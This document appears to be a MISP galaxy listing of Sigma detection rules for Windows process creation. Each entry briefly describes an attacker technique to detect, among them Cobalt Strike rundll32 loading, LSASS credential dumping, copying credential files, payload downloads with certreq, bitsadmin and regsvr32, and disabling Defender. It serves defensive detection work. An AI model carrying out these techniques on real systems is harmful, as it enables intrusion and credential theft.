Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. These ".lst" file can contain references to external program that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living of the land utility.

Internal MISP references

UUID 99c8be4f-3087-4f9f-9c24-8c7e257b442e which can be used as unique global reference for Setup16.EXE Execution With Custom .Lst File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2024-12-01
falsepositive ['On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare.']
filename proc_creation_win_setup16_custom_lst_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.005']
Related clusters

To see the related clusters, click here.

Firewall Rule Update Via Netsh.EXE

Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule

Internal MISP references

UUID a70dcb37-3bee-453a-99df-d0c683151be6 which can be used as unique global reference for Firewall Rule Update Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023-07-18
falsepositive ['Legitimate administration activity', 'Software installations and removal']
filename proc_creation_win_netsh_fw_set_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

CobaltStrike Load by Rundll32

Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.

Internal MISP references

UUID ae9c6a7c-9521-42a6-915e-5aaa8689d529 which can be used as unique global reference for CobaltStrike Load by Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Wojciech Lesicki
creation_date 2021-06-01
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Copying Sensitive Files with Credential Data

Files with well-known filenames (sensitive files with credential data) copying

Internal MISP references

UUID e7be6119-fc37-43f0-ad4f-1f3f99be2f9f which can be used as unique global reference for Copying Sensitive Files with Credential Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
creation_date 2019-10-22
falsepositive ['Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator.']
filename proc_creation_win_esentutl_sensitive_file_copy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.002', 'attack.t1003.003', 'car.2013-07-001', 'attack.s0404']
Related clusters

To see the related clusters, click here.

WMIC Remote Command Execution

Detects the execution of WMIC to query information on a remote system

Internal MISP references

UUID 7773b877-5abb-4a3e-b9c9-fd0369b59b00 which can be used as unique global reference for WMIC Remote Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-14
falsepositive ['Unknown']
filename proc_creation_win_wmic_remote_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Potential Defense Evasion Via Right-to-Left Override

Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques.

Internal MISP references

UUID ad691d92-15f2-4181-9aa4-723c74f9ddc3 which can be used as unique global reference for Potential Defense Evasion Via Right-to-Left Override in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2023-02-15
falsepositive ['Commandlines that contains scriptures such as arabic or hebrew might make use of this character']
filename proc_creation_win_susp_right_to_left_override.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.002']
Related clusters

To see the related clusters, click here.

Suspicious Control Panel DLL Load

Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits

Internal MISP references

UUID d7eb979b-c2b5-4a6f-a3a7-c87ce6763819 which can be used as unique global reference for Suspicious Control Panel DLL Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017-04-15
falsepositive ['Unknown']
filename proc_creation_win_rundll32_susp_control_dll_load.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Suspicious CertReq Command to Download

Detects a suspicious CertReq execution downloading a file. This behavior is often used by attackers to download additional payloads or configuration files. Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.

Internal MISP references

UUID 4480827a-9799-4232-b2c4-ccc6c4e9e12b which can be used as unique global reference for Suspicious CertReq Command to Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-11-24
falsepositive ['Unlikely']
filename proc_creation_win_certreq_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Remote Access Tool - GoToAssist Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID b6d98a4f-cef0-4abf-bbf6-24132854a83d which can be used as unique global reference for Remote Access Tool - GoToAssist Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-13
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_gotoopener.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Potential Product Class Reconnaissance Via Wmic.EXE

Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products. Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms. This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.

Internal MISP references

UUID e568650b-5dcd-4658-8f34-ded0b1e13992 which can be used as unique global reference for Potential Product Class Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2023-02-14
falsepositive ['Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispywware products.']
filename proc_creation_win_wmic_recon_product_class.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Scheduled Task Executing Encoded Payload from Registry

Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.

Internal MISP references

UUID c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 which can be used as unique global reference for Scheduled Task Executing Encoded Payload from Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-02-12
falsepositive ['Unlikely']
filename proc_creation_win_schtasks_reg_loader_encoded.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool - CrackMapExec Execution Patterns

Detects various execution patterns of the CrackMapExec pentesting framework

Internal MISP references

UUID 058f4380-962d-40a5-afce-50207d36d7e2 which can be used as unique global reference for HackTool - CrackMapExec Execution Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2020-05-22
falsepositive ['Unknown']
filename proc_creation_win_hktl_crackmapexec_execution_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1047', 'attack.t1053', 'attack.t1059.003', 'attack.t1059.001', 'attack.s0106']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Regsvr32 HTTP IP Pattern

Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.

Internal MISP references

UUID 2dd2c217-bf68-437a-b57c-fe9fd01d5de8 which can be used as unique global reference for Potentially Suspicious Regsvr32 HTTP IP Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-11
falsepositive ['FQDNs that start with a number such as "7-Zip"']
filename proc_creation_win_regsvr32_http_ip_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

PUA - SoftPerfect Netscan Execution

Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.

Internal MISP references

UUID ca387a8e-1c84-4da3-9993-028b45342d30 which can be used as unique global reference for PUA - SoftPerfect Netscan Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_ (Wuerth-Phoenix)
creation_date 2024-04-25
falsepositive ['Legitimate administrator activity']
filename proc_creation_win_pua_netscan.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

PUA - System Informer Execution

Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations

Internal MISP references

UUID 5722dff1-4bdd-4949-86ab-fbaf707e767a which can be used as unique global reference for PUA - System Informer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023-05-08
falsepositive ['System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly']
filename proc_creation_win_pua_system_informer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.discovery', 'attack.defense-evasion', 'attack.t1082', 'attack.t1564', 'attack.t1543']
Related clusters

To see the related clusters, click here.

Suspicious Obfuscated PowerShell Code

Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines

Internal MISP references

UUID 8d01b53f-456f-48ee-90f6-bc28e67d4e35 which can be used as unique global reference for Suspicious Obfuscated PowerShell Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-07-11
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_encoded_obfusc.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Winrar Compressing Dump Files

Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

Internal MISP references

UUID 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc which can be used as unique global reference for Winrar Compressing Dump Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-04
falsepositive ['Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally', 'Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting']
filename proc_creation_win_winrar_exfil_dmp_files.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

File Download Via Bitsadmin

Detects usage of bitsadmin downloading a file

Internal MISP references

UUID d059842b-6b9d-4ed1-b5c3-5b89143c6ede which can be used as unique global reference for File Download Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag, FPT.EagleEye
creation_date 2017-03-09
falsepositive ['Some legitimate apps use this, but limited.']
filename proc_creation_win_bitsadmin_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Windows Firewall Disabled via PowerShell

Detects attempts to disable the Windows Firewall using PowerShell

Internal MISP references

UUID 12f6b752-042d-483e-bf9c-915a6d06ad75 which can be used as unique global reference for Windows Firewall Disabled via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022-09-14
falsepositive ['Unknown']
filename proc_creation_win_powershell_disable_firewall.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Potential PowerShell Downgrade Attack

Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0

Internal MISP references

UUID b3512211-c67e-4707-bedc-66efc7848863 which can be used as unique global reference for Potential PowerShell Downgrade Attack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harish Segar (rule)
creation_date 2020-03-20
falsepositive ['Unknown']
filename proc_creation_win_powershell_downgrade_attack.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Clip

Detects Obfuscated Powershell via use Clip.exe in Scripts

Internal MISP references

UUID e1561947-b4e3-4a74-9bdd-83baed21bdb5 which can be used as unique global reference for Invoke-Obfuscation Via Use Clip in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020-10-09
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Service Reconnaissance Via Wmic.EXE

An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable

Internal MISP references

UUID 76f55eaa-d27f-4213-9d45-7b0e4b60bbae which can be used as unique global reference for Service Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_service.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Execute Code with Pester.bat

Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)

Internal MISP references

UUID 59e938ff-0d6d-4dc3-b13f-36cc28734d4e which can be used as unique global reference for Execute Code with Pester.bat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020-10-08
falsepositive ['Legitimate use of Pester for writing tests for Powershell scripts and modules']
filename proc_creation_win_lolbin_pester_1.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

PUA - RunXCmd Execution

Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts

Internal MISP references

UUID 93199800-b52a-4dec-b762-75212c196542 which can be used as unique global reference for PUA - RunXCmd Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-24
falsepositive ['Legitimate use by administrators']
filename proc_creation_win_pua_runxcmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Suspicious File Download From IP Via Wget.EXE - Paths

Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe

Internal MISP references

UUID 40aa399c-7b02-4715-8e5f-73572b493f33 which can be used as unique global reference for Suspicious File Download From IP Via Wget.EXE - Paths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-02-23
falsepositive ['Unknown']
filename proc_creation_win_wget_download_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

PowerShell Base64 Encoded FromBase64String Cmdlet

Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line

Internal MISP references

UUID fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c which can be used as unique global reference for PowerShell Base64 Encoded FromBase64String Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-08-24
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_frombase64string.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1140', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Change Default File Association To Executable Via Assoc

Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

Internal MISP references

UUID ae6f14e6-14de-45b0-9f44-c0986f50dc89 which can be used as unique global reference for Change Default File Association To Executable Via Assoc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-28
falsepositive ['Unknown']
filename proc_creation_win_cmd_assoc_tamper_exe_file_association.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.001']
Related clusters

To see the related clusters, click here.

Suspicious WmiPrvSE Child Process

Detects suspicious and uncommon child processes of WmiPrvSE

Internal MISP references

UUID 8a582fe2-0882-4b89-a82a-da6b2dc32937 which can be used as unique global reference for Suspicious WmiPrvSE Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
creation_date 2021-08-23
falsepositive ['Unknown']
filename proc_creation_win_wmiprvse_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.t1047', 'attack.t1204.002', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE

Detects usage of cmdkey to look for cached credentials on the system

Internal MISP references

UUID 07f8bdc2-c9b3-472a-9817-5a670b872f53 which can be used as unique global reference for Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2019-01-16
falsepositive ['Legitimate administrative tasks']
filename proc_creation_win_cmdkey_recon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.005']
Related clusters

To see the related clusters, click here.

Remote Code Execute via Winrm.vbs

Detects an attempt to execute code or create service on remote host via winrm.vbs.

Internal MISP references

UUID 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0 which can be used as unique global reference for Remote Code Execute via Winrm.vbs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020-10-07
falsepositive ['Unknown']
filename proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Via WER

Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass

Internal MISP references

UUID 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3 which can be used as unique global reference for Potential Credential Dumping Via WER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @pbssubhash , Nasreddine Bencherchali
creation_date 2022-12-08
falsepositive ['Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine.']
filename proc_creation_win_werfault_lsass_shtinkering.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Start of NT Virtual DOS Machine

Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications

Internal MISP references

UUID 16905e21-66ee-42fe-b256-1318ada2d770 which can be used as unique global reference for Start of NT Virtual DOS Machine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-07-16
falsepositive ['Legitimate use']
filename proc_creation_win_susp_16bit_application.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Invoke-Obfuscation Obfuscated IEX Invocation

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block

Internal MISP references

UUID 4bf943c6-5146-4273-98dd-e958fd1e3abf which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019-11-08
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Uncommon Extension Shim Database Installation Via Sdbinst.EXE

Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims

Internal MISP references

UUID 18ee686c-38a3-4f65-9f44-48a077141f42 which can be used as unique global reference for Uncommon Extension Shim Database Installation Via Sdbinst.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-01
falsepositive ['Unknown']
filename proc_creation_win_sdbinst_susp_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Suspicious SYSVOL Domain Group Policy Access

Detects Access to Domain Group Policies stored in SYSVOL

Internal MISP references

UUID 05f3c945-dcc8-4393-9f3d-af65077a8f86 which can be used as unique global reference for Suspicious SYSVOL Domain Group Policy Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Jonhnathan Ribeiro, oscd.community
creation_date 2018-04-09
falsepositive ['Administrative activity']
filename proc_creation_win_susp_sysvol_access.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Suspicious Diantz Alternate Data Stream Execution

Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

Internal MISP references

UUID 6b369ced-4b1d-48f1-b427-fdc0de0790bd which can be used as unique global reference for Suspicious Diantz Alternate Data Stream Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-11-26
falsepositive ['Very Possible']
filename proc_creation_win_lolbin_diantz_ads.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Suspicious Encoded PowerShell Command Line

Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)

Internal MISP references

UUID ca2092a1-c273-4878-9b4b-0d60115bf5ea which can be used as unique global reference for Suspicious Encoded PowerShell Command Line in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
creation_date 2018-09-03
falsepositive No established falsepositives
filename proc_creation_win_powershell_base64_encoded_cmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential PowerShell Obfuscation Via Reversed Commands

Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers

Internal MISP references

UUID b6b49cd1-34d6-4ead-b1bf-176e9edba9a4 which can be used as unique global reference for Potential PowerShell Obfuscation Via Reversed Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
creation_date 2020-10-11
falsepositive ['Unlikely']
filename proc_creation_win_powershell_cmdline_reversed_strings.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Uncommon Child Process Of BgInfo.EXE

Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

Internal MISP references

UUID aaf46cdc-934e-4284-b329-34aa701e3771 which can be used as unique global reference for Uncommon Child Process Of BgInfo.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
creation_date 2019-10-26
falsepositive ['Unknown']
filename proc_creation_win_bginfo_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.defense-evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Certificate Exported Via PowerShell

Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

Internal MISP references

UUID 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb which can be used as unique global reference for Certificate Exported Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-18
falsepositive ['Legitimate certificate exports by administrators. Additional filters might be required.']
filename proc_creation_win_powershell_export_certificate.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.execution', 'attack.t1552.004', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Net WebClient Casing Anomalies

Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques

Internal MISP references

UUID c86133ad-4725-4bd0-8170-210788e0a7ba which can be used as unique global reference for Net WebClient Casing Anomalies in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-05-24
falsepositive ['Unknown']
filename proc_creation_win_powershell_webclient_casing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Reg Add Suspicious Paths

Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys

Internal MISP references

UUID b7e2a8d4-74bb-4b78-adc9-3f92af2d4829 which can be used as unique global reference for Reg Add Suspicious Paths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-19
falsepositive ['Rare legitimate add to registry via cli (to these locations)']
filename proc_creation_win_reg_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'

Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9'). This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level. An attacker might use this technique via the command line to bypass defenses before executing payloads.

Internal MISP references

UUID 1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e which can be used as unique global reference for PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction' in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Matt Anderson (Huntress)
creation_date 2025-07-11
falsepositive ['Highly unlikely']
filename proc_creation_win_defender_default_action_modified.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Set Suspicious Files as System Files Using Attrib.EXE

Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs

Internal MISP references

UUID efec536f-72e8-4656-8960-5e85d091345b which can be used as unique global reference for Set Suspicious Files as System Files Using Attrib.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-28
falsepositive ['Unknown']
filename proc_creation_win_attrib_system_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Mailbox Export to Share

Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations

Internal MISP references

UUID 889719ef-dd62-43df-86c3-768fb08dc7c0 which can be used as unique global reference for Suspicious PowerShell Mailbox Export to Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-08-07
falsepositive ['Unknown']
filename proc_creation_win_powershell_mailboxexport_share.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration']

